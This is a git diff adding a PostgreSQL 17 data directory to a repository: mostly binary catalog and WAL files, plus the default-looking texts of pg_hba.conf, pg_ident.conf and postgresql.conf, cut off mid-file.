a/postgres/data/base/5/6239 b/postgres/data/base/5/6239 new file mode 100755 index 0000000..6c60b50 Binary files /dev/null and b/postgres/data/base/5/6239 differ diff --git a/postgres/data/base/5/826 b/postgres/data/base/5/826 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/5/827 b/postgres/data/base/5/827 new file mode 100755 index 0000000..f102efd Binary files /dev/null and b/postgres/data/base/5/827 differ diff --git a/postgres/data/base/5/828 b/postgres/data/base/5/828 new file mode 100755 index 0000000..e97c210 Binary files /dev/null and b/postgres/data/base/5/828 differ diff --git a/postgres/data/base/5/PG_VERSION b/postgres/data/base/5/PG_VERSION new file mode 100755 index 0000000..98d9bcb --- /dev/null +++ b/postgres/data/base/5/PG_VERSION @@ -0,0 +1 @@ +17 diff --git a/postgres/data/base/5/pg_filenode.map b/postgres/data/base/5/pg_filenode.map new file mode 100755 index 0000000..4fc801a Binary files /dev/null and b/postgres/data/base/5/pg_filenode.map differ diff --git a/postgres/data/global/1213 b/postgres/data/global/1213 new file mode 100755 index 0000000..eec8dc3 Binary files /dev/null and b/postgres/data/global/1213 differ diff --git a/postgres/data/global/1213_fsm b/postgres/data/global/1213_fsm new file mode 100755 index 0000000..86074be Binary files /dev/null and b/postgres/data/global/1213_fsm differ diff --git a/postgres/data/global/1213_vm b/postgres/data/global/1213_vm new file mode 100755 index 0000000..19685e9 Binary files /dev/null and b/postgres/data/global/1213_vm differ diff --git a/postgres/data/global/1214 b/postgres/data/global/1214 new file mode 100755 index 0000000..174ae02 Binary files /dev/null and b/postgres/data/global/1214 differ diff --git a/postgres/data/global/1214_fsm b/postgres/data/global/1214_fsm new file mode 100755 index 0000000..6215a7e Binary files /dev/null and b/postgres/data/global/1214_fsm differ diff --git a/postgres/data/global/1232 b/postgres/data/global/1232 new file mode 100755 index 0000000..ec0cfe7 Binary files /dev/null and b/postgres/data/global/1232 differ diff --git a/postgres/data/global/1233 b/postgres/data/global/1233 new file mode 100755 index 0000000..293c602 Binary files /dev/null and b/postgres/data/global/1233 differ diff --git a/postgres/data/global/1260 b/postgres/data/global/1260 new file mode 100755 index 0000000..25294f3 Binary files /dev/null and b/postgres/data/global/1260 differ diff --git a/postgres/data/global/1260_fsm b/postgres/data/global/1260_fsm new file mode 100755 index 0000000..4ee5faa Binary files /dev/null and b/postgres/data/global/1260_fsm differ diff --git a/postgres/data/global/1260_vm b/postgres/data/global/1260_vm new file mode 100755 index 0000000..3dc8382 Binary files /dev/null and b/postgres/data/global/1260_vm differ diff --git a/postgres/data/global/1261 b/postgres/data/global/1261 new file mode 100755 index 0000000..d705a0c Binary files /dev/null and b/postgres/data/global/1261 differ diff --git a/postgres/data/global/1261_fsm b/postgres/data/global/1261_fsm new file mode 100755 index 0000000..f32c23e Binary files /dev/null and b/postgres/data/global/1261_fsm differ diff --git a/postgres/data/global/1261_vm b/postgres/data/global/1261_vm new file mode 100755 index 0000000..a581c39 Binary files /dev/null and b/postgres/data/global/1261_vm differ diff --git a/postgres/data/global/1262 b/postgres/data/global/1262 new file mode 100755 index 0000000..21d8b09 Binary files /dev/null and b/postgres/data/global/1262 differ diff --git a/postgres/data/global/1262_fsm b/postgres/data/global/1262_fsm new file mode 100755 index 0000000..479fd94 Binary files /dev/null and b/postgres/data/global/1262_fsm differ diff --git a/postgres/data/global/1262_vm b/postgres/data/global/1262_vm new file mode 100755 index 0000000..c4c3c5d Binary files /dev/null and b/postgres/data/global/1262_vm differ diff --git a/postgres/data/global/2396 b/postgres/data/global/2396 new file mode 100755 index 0000000..e49d28b Binary files /dev/null and b/postgres/data/global/2396 differ diff --git a/postgres/data/global/2396_fsm b/postgres/data/global/2396_fsm new file mode 100755 index 0000000..7a4f24f Binary files /dev/null and b/postgres/data/global/2396_fsm differ diff --git a/postgres/data/global/2396_vm b/postgres/data/global/2396_vm new file mode 100755 index 0000000..7850d6a Binary files /dev/null and b/postgres/data/global/2396_vm differ diff --git a/postgres/data/global/2397 b/postgres/data/global/2397 new file mode 100755 index 0000000..3a83707 Binary files /dev/null and b/postgres/data/global/2397 differ diff --git a/postgres/data/global/2671 b/postgres/data/global/2671 new file mode 100755 index 0000000..b38d139 Binary files /dev/null and b/postgres/data/global/2671 differ diff --git a/postgres/data/global/2672 b/postgres/data/global/2672 new file mode 100755 index 0000000..ccce872 Binary files /dev/null and b/postgres/data/global/2672 differ diff --git a/postgres/data/global/2676 b/postgres/data/global/2676 new file mode 100755 index 0000000..8a626bc Binary files /dev/null and b/postgres/data/global/2676 differ diff --git a/postgres/data/global/2677 b/postgres/data/global/2677 new file mode 100755 index 0000000..b43d5d8 Binary files /dev/null and b/postgres/data/global/2677 differ diff --git a/postgres/data/global/2694 b/postgres/data/global/2694 new file mode 100755 index 0000000..ddd941b Binary files /dev/null and b/postgres/data/global/2694 differ diff --git a/postgres/data/global/2695 b/postgres/data/global/2695 new file mode 100755 index 0000000..763a32d Binary files /dev/null and b/postgres/data/global/2695 differ diff --git a/postgres/data/global/2697 b/postgres/data/global/2697 new file mode 100755 index 0000000..18caad2 Binary files /dev/null and b/postgres/data/global/2697 differ diff --git a/postgres/data/global/2698 b/postgres/data/global/2698 new file mode 100755 index 0000000..e7e9247 Binary files /dev/null and b/postgres/data/global/2698 differ diff --git a/postgres/data/global/2846 b/postgres/data/global/2846 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/2847 b/postgres/data/global/2847 new file mode 100755 index 0000000..9405f95 Binary files /dev/null and b/postgres/data/global/2847 differ diff --git a/postgres/data/global/2964 b/postgres/data/global/2964 new file mode 100755 index 0000000..3f0d9bb Binary files /dev/null and b/postgres/data/global/2964 differ diff --git a/postgres/data/global/2965 b/postgres/data/global/2965 new file mode 100755 index 0000000..345fa4f Binary files /dev/null and b/postgres/data/global/2965 differ diff --git a/postgres/data/global/2966 b/postgres/data/global/2966 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/2967 b/postgres/data/global/2967 new file mode 100755 index 0000000..588aa84 Binary files /dev/null and b/postgres/data/global/2967 differ diff --git a/postgres/data/global/3592 b/postgres/data/global/3592 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/3593 b/postgres/data/global/3593 new file mode 100755 index 0000000..17d4fe9 Binary files /dev/null and b/postgres/data/global/3593 differ diff --git a/postgres/data/global/4060 b/postgres/data/global/4060 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/4061 b/postgres/data/global/4061 new file mode 100755 index 0000000..210916f Binary files /dev/null and b/postgres/data/global/4061 differ diff --git a/postgres/data/global/4175 b/postgres/data/global/4175 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/4176 b/postgres/data/global/4176 new file mode 100755 index 0000000..c321477 Binary files /dev/null and b/postgres/data/global/4176 differ diff --git a/postgres/data/global/4177 b/postgres/data/global/4177 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/4178 b/postgres/data/global/4178 new file mode 100755 index 0000000..27db3c0 Binary files /dev/null and b/postgres/data/global/4178 differ diff --git a/postgres/data/global/4181 b/postgres/data/global/4181 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/4182 b/postgres/data/global/4182 new file mode 100755 index 0000000..a22e4a3 Binary files /dev/null and b/postgres/data/global/4182 differ diff --git a/postgres/data/global/4183 b/postgres/data/global/4183 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/4184 b/postgres/data/global/4184 new file mode 100755 index 0000000..242a319 Binary files /dev/null and b/postgres/data/global/4184 differ diff --git a/postgres/data/global/4185 b/postgres/data/global/4185 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/4186 b/postgres/data/global/4186 new file mode 100755 index 0000000..060ba86 Binary files /dev/null and b/postgres/data/global/4186 differ diff --git a/postgres/data/global/6000 b/postgres/data/global/6000 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/6001 b/postgres/data/global/6001 new file mode 100755 index 0000000..d18737c Binary files /dev/null and b/postgres/data/global/6001 differ diff --git a/postgres/data/global/6002 b/postgres/data/global/6002 new file mode 100755 index 0000000..a066fe1 Binary files /dev/null and b/postgres/data/global/6002 differ diff --git a/postgres/data/global/6100 b/postgres/data/global/6100 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/6114 b/postgres/data/global/6114 new file mode 100755 index 0000000..bf887fa Binary files /dev/null and b/postgres/data/global/6114 differ diff --git a/postgres/data/global/6115 b/postgres/data/global/6115 new file mode 100755 index 0000000..afafca8 Binary files /dev/null and b/postgres/data/global/6115 differ diff --git a/postgres/data/global/6243 b/postgres/data/global/6243 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/6244 b/postgres/data/global/6244 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/global/6245 b/postgres/data/global/6245 new file mode 100755 index 0000000..1a9e142 Binary files /dev/null and b/postgres/data/global/6245 differ diff --git a/postgres/data/global/6246 b/postgres/data/global/6246 new file mode 100755 index 0000000..40d7bd8 Binary files /dev/null and b/postgres/data/global/6246 differ diff --git a/postgres/data/global/6247 b/postgres/data/global/6247 new file mode 100755 index 0000000..22e8881 Binary files /dev/null and b/postgres/data/global/6247 differ diff --git a/postgres/data/global/6302 b/postgres/data/global/6302 new file mode 100755 index 0000000..b0aa180 Binary files /dev/null and b/postgres/data/global/6302 differ diff --git a/postgres/data/global/6303 b/postgres/data/global/6303 new file mode 100755 index 0000000..155f91a Binary files /dev/null and b/postgres/data/global/6303 differ diff --git a/postgres/data/global/pg_control b/postgres/data/global/pg_control new file mode 100755 index 0000000..99b53a0 Binary files /dev/null and b/postgres/data/global/pg_control differ diff --git a/postgres/data/global/pg_filenode.map b/postgres/data/global/pg_filenode.map new file mode 100755 index 0000000..97c07a6 Binary files /dev/null and b/postgres/data/global/pg_filenode.map differ diff --git a/postgres/data/global/pg_internal.init b/postgres/data/global/pg_internal.init new file mode 100755 index 0000000..c604377 Binary files /dev/null and b/postgres/data/global/pg_internal.init differ diff --git a/postgres/data/pg_hba.conf b/postgres/data/pg_hba.conf new file mode 100755 index 0000000..7f379db --- /dev/null +++ b/postgres/data/pg_hba.conf @@ -0,0 +1,128 @@ +# PostgreSQL Client Authentication Configuration File +# =================================================== +# +# Refer to the "Client Authentication" section in the PostgreSQL +# documentation for a complete description of this file. A short +# synopsis follows. +# +# ---------------------- +# Authentication Records +# ---------------------- +# +# This file controls: which hosts are allowed to connect, how clients +# are authenticated, which PostgreSQL user names they can use, which +# databases they can access. Records take one of these forms: +# +# local DATABASE USER METHOD [OPTIONS] +# host DATABASE USER ADDRESS METHOD [OPTIONS] +# hostssl DATABASE USER ADDRESS METHOD [OPTIONS] +# hostnossl DATABASE USER ADDRESS METHOD [OPTIONS] +# hostgssenc DATABASE USER ADDRESS METHOD [OPTIONS] +# hostnogssenc DATABASE USER ADDRESS METHOD [OPTIONS] +# +# (The uppercase items must be replaced by actual values.) +# +# The first field is the connection type: +# - "local" is a Unix-domain socket +# - "host" is a TCP/IP socket (encrypted or not) +# - "hostssl" is a TCP/IP socket that is SSL-encrypted +# - "hostnossl" is a TCP/IP socket that is not SSL-encrypted +# - "hostgssenc" is a TCP/IP socket that is GSSAPI-encrypted +# - "hostnogssenc" is a TCP/IP socket that is not GSSAPI-encrypted +# +# DATABASE can be "all", "sameuser", "samerole", "replication", a +# database name, a regular expression (if it starts with a slash (/)) +# or a comma-separated list thereof. The "all" keyword does not match +# "replication". Access to replication must be enabled in a separate +# record (see example below). +# +# USER can be "all", a user name, a group name prefixed with "+", a +# regular expression (if it starts with a slash (/)) or a comma-separated +# list thereof. In both the DATABASE and USER fields you can also write +# a file name prefixed with "@" to include names from a separate file. +# +# ADDRESS specifies the set of hosts the record matches. It can be a +# host name, or it is made up of an IP address and a CIDR mask that is +# an integer (between 0 and 32 (IPv4) or 128 (IPv6) inclusive) that +# specifies the number of significant bits in the mask. A host name +# that starts with a dot (.) matches a suffix of the actual host name. +# Alternatively, you can write an IP address and netmask in separate +# columns to specify the set of hosts. Instead of a CIDR-address, you +# can write "samehost" to match any of the server's own IP addresses, +# or "samenet" to match any address in any subnet that the server is +# directly connected to. +# +# METHOD can be "trust", "reject", "md5", "password", "scram-sha-256", +# "gss", "sspi", "ident", "peer", "pam", "ldap", "radius" or "cert". +# Note that "password" sends passwords in clear text; "md5" or +# "scram-sha-256" are preferred since they send encrypted passwords. +# +# OPTIONS are a set of options for the authentication in the format +# NAME=VALUE. The available options depend on the different +# authentication methods -- refer to the "Client Authentication" +# section in the documentation for a list of which options are +# available for which authentication methods. +# +# Database and user names containing spaces, commas, quotes and other +# special characters must be quoted. Quoting one of the keywords +# "all", "sameuser", "samerole" or "replication" makes the name lose +# its special character, and just match a database or username with +# that name. +# +# --------------- +# Include Records +# --------------- +# +# This file allows the inclusion of external files or directories holding +# more records, using the following keywords: +# +# include FILE +# include_if_exists FILE +# include_dir DIRECTORY +# +# FILE is the file name to include, and DIR is the directory name containing +# the file(s) to include. Any file in a directory will be loaded if suffixed +# with ".conf". The files of a directory are ordered by name. +# include_if_exists ignores missing files. FILE and DIRECTORY can be +# specified as a relative or an absolute path, and can be double-quoted if +# they contain spaces. +# +# ------------- +# Miscellaneous +# ------------- +# +# This file is read on server startup and when the server receives a +# SIGHUP signal. If you edit the file on a running system, you have to +# SIGHUP the server for the changes to take effect, run "pg_ctl reload", +# or execute "SELECT pg_reload_conf()". +# +# ---------------------------------- +# Put your actual configuration here +# ---------------------------------- +# +# If you want to allow non-local connections, you need to add more +# "host" records. In that case you will also need to make PostgreSQL +# listen on a non-local interface via the listen_addresses +# configuration parameter, or via the -i or -h command line switches. + +# CAUTION: Configuring the system for local "trust" authentication +# allows any local user to connect as any PostgreSQL user, including +# the database superuser. If you do not trust all your local users, +# use another authentication method. + + +# TYPE DATABASE USER ADDRESS METHOD + +# "local" is for Unix domain socket connections only +local all all trust +# IPv4 local connections: +host all all 127.0.0.1/32 trust +# IPv6 local connections: +host all all ::1/128 trust +# Allow replication connections from localhost, by a user with the +# replication privilege. +local replication all trust +host replication all 127.0.0.1/32 trust +host replication all ::1/128 trust + +host all all all scram-sha-256 diff --git a/postgres/data/pg_ident.conf b/postgres/data/pg_ident.conf new file mode 100755 index 0000000..f5225f2 --- /dev/null +++ b/postgres/data/pg_ident.conf @@ -0,0 +1,72 @@ +# PostgreSQL User Name Maps +# ========================= +# +# --------------- +# Mapping Records +# --------------- +# +# Refer to the PostgreSQL documentation, chapter "Client +# Authentication" for a complete description. A short synopsis +# follows. +# +# This file controls PostgreSQL user name mapping. It maps external +# user names to their corresponding PostgreSQL user names. Records +# are of the form: +# +# MAPNAME SYSTEM-USERNAME PG-USERNAME +# +# (The uppercase quantities must be replaced by actual values.) +# +# MAPNAME is the (otherwise freely chosen) map name that was used in +# pg_hba.conf. SYSTEM-USERNAME is the detected user name of the +# client. PG-USERNAME is the requested PostgreSQL user name. The +# existence of a record specifies that SYSTEM-USERNAME may connect as +# PG-USERNAME. +# +# If SYSTEM-USERNAME starts with a slash (/), it will be treated as a +# regular expression. Optionally this can contain a capture (a +# parenthesized subexpression). The substring matching the capture +# will be substituted for \1 (backslash-one) if present in +# PG-USERNAME. +# +# PG-USERNAME can be "all", a user name, a group name prefixed with "+", or +# a regular expression (if it starts with a slash (/)). If it is a regular +# expression, the substring matching with \1 has no effect. +# +# Multiple maps may be specified in this file and used by pg_hba.conf. +# +# No map names are defined in the default configuration. If all +# system user names and PostgreSQL user names are the same, you don't +# need anything in this file. +# +# --------------- +# Include Records +# --------------- +# +# This file allows the inclusion of external files or directories holding +# more records, using the following keywords: +# +# include FILE +# include_if_exists FILE +# include_dir DIRECTORY +# +# FILE is the file name to include, and DIR is the directory name containing +# the file(s) to include. Any file in a directory will be loaded if suffixed +# with ".conf". The files of a directory are ordered by name. +# include_if_exists ignores missing files. FILE and DIRECTORY can be +# specified as a relative or an absolute path, and can be double-quoted if +# they contain spaces. +# +# ------------------------------- +# Miscellaneous +# ------------------------------- +# +# This file is read on server startup and when the postmaster receives +# a SIGHUP signal. If you edit the file on a running system, you have +# to SIGHUP the postmaster for the changes to take effect. You can +# use "pg_ctl reload" to do that. + +# Put your actual configuration here +# ---------------------------------- + +# MAPNAME SYSTEM-USERNAME PG-USERNAME diff --git a/postgres/data/pg_logical/replorigin_checkpoint b/postgres/data/pg_logical/replorigin_checkpoint new file mode 100755 index 0000000..ec451b0 Binary files /dev/null and b/postgres/data/pg_logical/replorigin_checkpoint differ diff --git a/postgres/data/pg_multixact/members/0000 b/postgres/data/pg_multixact/members/0000 new file mode 100755 index 0000000..6d17cf9 Binary files /dev/null and b/postgres/data/pg_multixact/members/0000 differ diff --git a/postgres/data/pg_multixact/offsets/0000 b/postgres/data/pg_multixact/offsets/0000 new file mode 100755 index 0000000..6d17cf9 Binary files /dev/null and b/postgres/data/pg_multixact/offsets/0000 differ diff --git a/postgres/data/pg_subtrans/0000 b/postgres/data/pg_subtrans/0000 new file mode 100755 index 0000000..6d17cf9 Binary files /dev/null and b/postgres/data/pg_subtrans/0000 differ diff --git a/postgres/data/pg_wal/000000010000000000000002 b/postgres/data/pg_wal/000000010000000000000002 new file mode 100755 index 0000000..7450257 Binary files /dev/null and b/postgres/data/pg_wal/000000010000000000000002 differ diff --git a/postgres/data/pg_wal/000000010000000000000003 b/postgres/data/pg_wal/000000010000000000000003 new file mode 100755 index 0000000..fa868bf Binary files /dev/null and b/postgres/data/pg_wal/000000010000000000000003 differ diff --git a/postgres/data/pg_xact/0000 b/postgres/data/pg_xact/0000 new file mode 100755 index 0000000..83901a2 Binary files /dev/null and b/postgres/data/pg_xact/0000 differ diff --git a/postgres/data/postgresql.auto.conf b/postgres/data/postgresql.auto.conf new file mode 100755 index 0000000..af7125e --- /dev/null +++ b/postgres/data/postgresql.auto.conf @@ -0,0 +1,2 @@ +# Do not edit this file manually! +# It will be overwritten by the ALTER SYSTEM command. diff --git a/postgres/data/postgresql.conf b/postgres/data/postgresql.conf new file mode 100755 index 0000000..19414a3 --- /dev/null +++ b/postgres/data/postgresql.conf @@ -0,0 +1,842 @@ +# ----------------------------- +# PostgreSQL configuration file +# ----------------------------- +# +# This file consists of lines of the form: +# +# name = value +# +# (The "=" is optional.) Whitespace may be used. Comments are introduced with +# "#" anywhere on a line. The complete list of parameter names and allowed +# values can be found in the PostgreSQL documentation. +# +# The commented-out settings shown in this file represent the default values. +# Re-commenting a setting is NOT sufficient to revert it to the default value; +# you need to reload the server. +# +# This file is read on server startup and when the server receives a SIGHUP +# signal. If you edit the file on a running system, you have to SIGHUP the +# server for the changes to take effect, run "pg_ctl reload", or execute +# "SELECT pg_reload_conf()". Some parameters, which are marked below, +# require a server shutdown and restart to take effect. +# +# Any parameter can also be given as a command-line option to the server, e.g., +# "postgres -c log_connections=on". Some parameters can be changed at run time +# with the "SET" SQL command. +# +# Memory units: B = bytes Time units: us = microseconds +# kB = kilobytes ms = milliseconds +# MB = megabytes s = seconds +# GB = gigabytes min = minutes +# TB = terabytes h = hours +# d = days + + +#------------------------------------------------------------------------------ +# FILE LOCATIONS +#------------------------------------------------------------------------------ + +# The default values of these variables are driven from the -D command-line +# option or PGDATA environment variable, represented here as ConfigDir. + +#data_directory = 'ConfigDir' # use data in another directory + # (change requires restart) +#hba_file = 'ConfigDir/pg_hba.conf' # host-based authentication file + # (change requires restart) +#ident_file = 'ConfigDir/pg_ident.conf' # ident configuration file + # (change requires restart) + +# If external_pid_file is not explicitly set, no extra PID file is written. +#external_pid_file = '' # write an extra PID file + # (change requires restart) + + +#------------------------------------------------------------------------------ +# CONNECTIONS AND AUTHENTICATION +#------------------------------------------------------------------------------ + +# - Connection Settings - + +listen_addresses = '*' + # comma-separated list of addresses; + # defaults to 'localhost'; use '*' for all + # (change requires restart) +#port = 5432 # (change requires restart) +max_connections = 100 # (change requires restart) +#reserved_connections = 0 # (change requires restart) +#superuser_reserved_connections = 3 # (change requires restart) +#unix_socket_directories = '/var/run/postgresql' # comma-separated list of directories + # (change requires restart) +#unix_socket_group = '' # (change requires restart) +#unix_socket_permissions = 0777 # begin with 0 to use octal notation + # (change requires restart) +#bonjour = off # advertise server via Bonjour + # (change requires restart) +#bonjour_name = '' # defaults to the computer name + # (change requires restart) + +# - TCP settings - +# see "man tcp" for details + +#tcp_keepalives_idle = 0 # TCP_KEEPIDLE, in seconds; + # 0 selects the system default +#tcp_keepalives_interval = 0 # TCP_KEEPINTVL, in seconds; + # 0 selects the system default +#tcp_keepalives_count = 0 # TCP_KEEPCNT; + # 0 selects the system default +#tcp_user_timeout = 0 # TCP_USER_TIMEOUT, in milliseconds; + # 0 selects the system default + +#client_connection_check_interval = 0 # time between checks for client + # disconnection while running queries; + # 0 for never + +# - Authentication - + +#authentication_timeout = 1min # 1s-600s +#password_encryption = scram-sha-256 # scram-sha-256 or md5 +#scram_iterations = 4096 + +# GSSAPI using Kerberos +#krb_server_keyfile = 'FILE:${sysconfdir}/krb5.keytab' +#krb_caseins_users = off +#gss_accept_delegation = off + +# - SSL - + +#ssl = off +#ssl_ca_file = '' +#ssl_cert_file = 'server.crt' +#ssl_crl_file = '' +#ssl_crl_dir = '' +#ssl_key_file = 'server.key' +#ssl_ciphers = 'HIGH:MEDIUM:+3DES:!aNULL' # allowed SSL ciphers +#ssl_prefer_server_ciphers = on +#ssl_ecdh_curve = 'prime256v1' +#ssl_min_protocol_version = 'TLSv1.2' +#ssl_max_protocol_version = '' +#ssl_dh_params_file = '' +#ssl_passphrase_command = '' +#ssl_passphrase_command_supports_reload = off + + +#------------------------------------------------------------------------------ +# RESOURCE USAGE (except WAL) +#------------------------------------------------------------------------------ + +# - Memory - + +shared_buffers = 128MB # min 128kB + # (change requires restart) +#huge_pages = try # on, off, or try + # (change requires restart) +#huge_page_size = 0 # zero for system default + # (change requires restart) +#temp_buffers = 8MB # min 800kB +#max_prepared_transactions = 0 # zero disables the feature + # (change requires restart) +# Caution: it is not advisable to set max_prepared_transactions nonzero unless +# you actively intend to use prepared transactions. +#work_mem = 4MB # min 64kB +#hash_mem_multiplier = 2.0 # 1-1000.0 multiplier on hash table work_mem +#maintenance_work_mem = 64MB # min 64kB +#autovacuum_work_mem = -1 # min 64kB, or -1 to use maintenance_work_mem +#logical_decoding_work_mem = 64MB # min 64kB +#max_stack_depth = 2MB # min 100kB +#shared_memory_type = mmap # the default is the first option + # supported by the operating system: + # mmap + # sysv + # windows + # (change requires restart) +dynamic_shared_memory_type = posix # the default is usually the first option + # supported by the operating system: + # posix + # sysv + # windows + # mmap + # (change requires restart) +#min_dynamic_shared_memory = 0MB # (change requires restart) +#vacuum_buffer_usage_limit = 2MB # size of vacuum and analyze buffer access strategy ring; + # 0 to disable vacuum buffer access strategy; + # range 128kB to 16GB + +# SLRU buffers (change requires restart) +#commit_timestamp_buffers = 0 # memory for pg_commit_ts (0 = auto) +#multixact_offset_buffers = 16 # memory for pg_multixact/offsets +#multixact_member_buffers = 32 # memory for pg_multixact/members +#notify_buffers = 16 # memory for pg_notify +#serializable_buffers = 32 # memory for pg_serial +#subtransaction_buffers = 0 # memory for pg_subtrans (0 = auto) +#transaction_buffers = 0 # memory for pg_xact (0 = auto) + +# - Disk - + +#temp_file_limit = -1 # limits per-process temp file space + # in kilobytes, or -1 for no limit + +#max_notify_queue_pages = 1048576 # limits the number of SLRU pages allocated + # for NOTIFY / LISTEN queue + +# - Kernel Resources - + +#max_files_per_process = 1000 # min 64 + # (change requires restart) + +# - Cost-Based Vacuum Delay - + +#vacuum_cost_delay = 0 # 0-100 milliseconds (0 disables) +#vacuum_cost_page_hit = 1 # 0-10000 credits +#vacuum_cost_page_miss = 2 # 0-10000 credits +#vacuum_cost_page_dirty = 20 # 0-10000 credits +#vacuum_cost_limit = 200 # 1-10000 credits + +# - Background Writer - + +#bgwriter_delay = 200ms # 10-10000ms between rounds +#bgwriter_lru_maxpages = 100 # max buffers written/round, 0 disables +#bgwriter_lru_multiplier = 2.0 # 0-10.0 multiplier on buffers scanned/round +#bgwriter_flush_after = 512kB # measured in pages, 0 disables + +# - Asynchronous Behavior - + +#backend_flush_after = 0 # measured in pages, 0 disables +#effective_io_concurrency = 1 # 1-1000; 0 disables prefetching +#maintenance_io_concurrency = 10 # 1-1000; 0 disables prefetching +#io_combine_limit = 128kB # usually 1-32 blocks (depends on OS) +#max_worker_processes = 8 # (change requires restart) +#max_parallel_workers_per_gather = 2 # limited by max_parallel_workers +#max_parallel_maintenance_workers = 2 # limited by max_parallel_workers +#max_parallel_workers = 8 # number of max_worker_processes that + # can be used in parallel operations +#parallel_leader_participation = on + + +#------------------------------------------------------------------------------ +# WRITE-AHEAD LOG +#------------------------------------------------------------------------------ + +# - Settings - + +#wal_level = replica # minimal, replica, or logical + # (change requires restart) +#fsync = on # flush data to disk for crash safety + # (turning this off can cause + # unrecoverable data corruption) +#synchronous_commit = on # synchronization level; + # off, local, remote_write, remote_apply, or on +#wal_sync_method = fsync # the default is the first option + # supported by the operating system: + # open_datasync + # fdatasync (default on Linux and FreeBSD) + # fsync + # fsync_writethrough + # open_sync +#full_page_writes = on # recover from partial page writes +#wal_log_hints = off # also do full page writes of non-critical updates + # (change requires restart) +#wal_compression = off # enables compression of full-page writes; + # off, pglz, lz4, zstd, or on +#wal_init_zero = on # zero-fill new WAL files +#wal_recycle = on # recycle WAL files +#wal_buffers = -1 # min 32kB, -1 sets based on shared_buffers + # (change requires restart) +#wal_writer_delay = 200ms # 1-10000 milliseconds +#wal_writer_flush_after = 1MB # measured in pages, 0 disables +#wal_skip_threshold = 2MB + +#commit_delay = 0 # range 0-100000, in microseconds +#commit_siblings = 5 # range 1-1000 + +# - Checkpoints - + +#checkpoint_timeout = 5min # range 30s-1d +#checkpoint_completion_target = 0.9 # checkpoint target duration, 0.0 - 1.0 +#checkpoint_flush_after = 256kB # measured in pages, 0 disables +#checkpoint_warning = 30s # 0 disables +max_wal_size = 1GB +min_wal_size = 80MB + +# - Prefetching during recovery - + +#recovery_prefetch = try # prefetch pages referenced in the WAL? +#wal_decode_buffer_size = 512kB # lookahead window used for prefetching + # (change requires restart) + +# - Archiving - + +#archive_mode = off # enables archiving; off, on, or always + # (change requires restart) +#archive_library = '' # library to use to archive a WAL file + # (empty string indicates archive_command should + # be used) +#archive_command = '' # command to use to archive a WAL file + # placeholders: %p = path of file to archive + # %f = file name only + # e.g. 'test ! -f /mnt/server/archivedir/%f && cp %p /mnt/server/archivedir/%f' +#archive_timeout = 0 # force a WAL file switch after this + # number of seconds; 0 disables + +# - Archive Recovery - + +# These are only used in recovery mode. + +#restore_command = '' # command to use to restore an archived WAL file + # placeholders: %p = path of file to restore + # %f = file name only + # e.g. 'cp /mnt/server/archivedir/%f %p' +#archive_cleanup_command = '' # command to execute at every restartpoint +#recovery_end_command = '' # command to execute at completion of recovery + +# - Recovery Target - + +# Set these only when performing a targeted recovery. + +#recovery_target = '' # 'immediate' to end recovery as soon as a + # consistent state is reached + # (change requires restart) +#recovery_target_name = '' # the named restore point to which recovery will proceed + # (change requires restart) +#recovery_target_time = '' # the time stamp up to which recovery will proceed + # (change requires restart) +#recovery_target_xid = '' # the transaction ID up to which recovery will proceed + # (change requires restart) +#recovery_target_lsn = '' # the WAL LSN up to which recovery will proceed + # (change requires restart) +#recovery_target_inclusive = on # Specifies whether to stop: + # just after the specified recovery target (on) + # just before the recovery target (off) + # (change requires restart) +#recovery_target_timeline = 'latest' # 'current', 'latest', or timeline ID + # (change requires restart) +#recovery_target_action = 'pause' # 'pause', 'promote', 'shutdown' + # (change requires restart) + +# - WAL Summarization - + +#summarize_wal = off # run WAL summarizer process? +#wal_summary_keep_time = '10d' # when to remove old summary files, 0 = never + + +#------------------------------------------------------------------------------ +# REPLICATION +#------------------------------------------------------------------------------ + +# - Sending Servers - + +# Set these on the primary and on any standby that will send replication data. + +#max_wal_senders = 10 # max number of walsender processes + # (change requires restart) +#max_replication_slots = 10 # max number of replication slots + # (change requires restart) +#wal_keep_size = 0 # in megabytes; 0 disables +#max_slot_wal_keep_size = -1 # in megabytes; -1 disables +#wal_sender_timeout = 60s # in milliseconds; 0 disables +#track_commit_timestamp = off # collect timestamp of transaction commit + # (change requires restart) + +# - Primary Server - + +# These settings are ignored on a standby server. + +#synchronous_standby_names = '' # standby servers that provide sync rep + # method to choose sync standbys, number of sync standbys, + # and comma-separated list of application_name + # from standby(s); '*' = all +#synchronized_standby_slots = '' # streaming replication standby server slot + # names that logical walsender processes will wait for + +# - Standby Servers - + +# These settings are ignored on a primary server. + +#primary_conninfo = '' # connection string to sending server +#primary_slot_name = '' # replication slot on sending server +#hot_standby = on # "off" disallows queries during recovery + # (change requires restart) +#max_standby_archive_delay = 30s # max delay before canceling queries + # when reading WAL from archive; + # -1 allows indefinite delay +#max_standby_streaming_delay = 30s # max delay before canceling queries + # when reading streaming WAL; + # -1 allows indefinite delay +#wal_receiver_create_temp_slot = off # create temp slot if primary_slot_name + # is not set +#wal_receiver_status_interval = 10s # send replies at least this often + # 0 disables +#hot_standby_feedback = off # send info from standby to prevent + # query conflicts +#wal_receiver_timeout = 60s # time that receiver waits for + # communication from primary + # in milliseconds; 0 disables +#wal_retrieve_retry_interval = 5s # time to wait before retrying to + # retrieve WAL after a failed attempt +#recovery_min_apply_delay = 0 # minimum delay for applying changes during recovery +#sync_replication_slots = off # enables slot synchronization on the physical standby from the primary + +# - Subscribers - + +# These settings are ignored on a publisher. + +#max_logical_replication_workers = 4 # taken from max_worker_processes + # (change requires restart) +#max_sync_workers_per_subscription = 2 # taken from max_logical_replication_workers +#max_parallel_apply_workers_per_subscription = 2 # taken from max_logical_replication_workers + + +#------------------------------------------------------------------------------ +# QUERY TUNING +#------------------------------------------------------------------------------ + +# - Planner Method 